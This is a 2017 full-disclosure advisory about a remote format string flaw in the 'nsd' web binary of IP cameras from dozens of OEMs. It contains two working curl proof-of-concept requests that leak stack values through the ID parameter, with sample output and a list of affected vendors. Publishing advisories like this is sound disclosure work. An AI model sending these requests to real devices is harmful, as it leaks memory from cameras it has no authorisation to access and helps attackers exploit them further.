Remote Stack Format String in 'nsd' binary from multiple OEM

Subject: Remote Stack Format String in 'nsd' binary from multiple OEM Attack vector: Remote Authentication: Anonymous (no credentials needed) Researcher: bashis <mcw noemail eu> (December 2017) PoC: https://github.com/mcw0/PoC Release date: December 14, 2017 Full Disclosure: 0-Day ### PoC 1) ``` $ curl 'http://[IP:PORT]/main/index.asp?ID=AAAA|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x&lg=BBBB' [...] function initHideWidget(){ document.getElementById("devip").value = "192.168.57.20"; document.getElementById("cameraid").value = 1; document.getElementById("streamid").value = 1; document.getElementById("id").value = "AAAA|5e2ff9f8|ffffffff|5e3006db|ea60|1|2|1|1|0|20cd3e0|7263733c|20747069"; document.getElementById("lg").value = "BBBB"; document.getElementById("port").value = 60000; document.getElementById("ipver").value = 1; document.getElementById("tprotocol").value = 2; document.getElementById("devtype").value = 1; document.getElementById("ismotorize").value = 1; [...] ``` Note: 'BBBB' are hiding within '5e3006db' 2) ``` curl -v "http://[IP:PORT]/Maintain/upgrade.asp?ID=|%p|%p|%p|%p|%p|%p" [...] function initHideWidget(){ document.getElementById("ip").value = "192.168.57.20"; document.getElementById("id").value = "|0x5d300484|0xffffffff|0xea60|0x1|0x2|0x1"; document.getElementById("port").value = 60000; document.getElementById("ipver").value = 1; document.getElementById("tprotocol").value = 2; document.getElementById("devtype").value = 1; [...] ``` ### Affected OEM * Huatu * I-View * IP Camera Web Service * Stanley Security * 3D Eyes CCTV Platform * Protech Srl * LS vision * GWSECU * 12 Legion Solution * HDVuk IP Camera * Intervid Security * Suzuki Tech * Wellsite IP Camera * iBrido * Protec IP Camera * Maxtron IP Camera * Ascendent * GTvs IP Camera * Squilla * Bikal IP Camera * MW Power * Alfa Vision * KMA Security * Tough Dog Security * Kpro HQ * Lanetwork * AFM Vision * ZetaDo * Jobsight Inc. * Datalab IP Technologies * 4Tvision * Proline UK * Tanz * Aisonic * HD-IP * PreSec Security Solution * EagleVision * Elemis Delta * Imenara * Gigamedia * Xavee * Honeywell * Boss Security * A.R.T Surveillance * Global Security * Securicorp * Securetech * Vapplica * Star * Stic * NeXus * Alnet * Spy Smart * Kompsos * Adler Security Systems * Nextan * Access * Toprotect * Kawah * LS StrateX * Senpei CCTV * Metcom * AFM Vision * Doron Technologies * Saviour Smart IoT Systems * Eagle-Eye * Faucon.at * BlueEagle Security * Campro * Opple * Level One * Video and Monitor System * K&D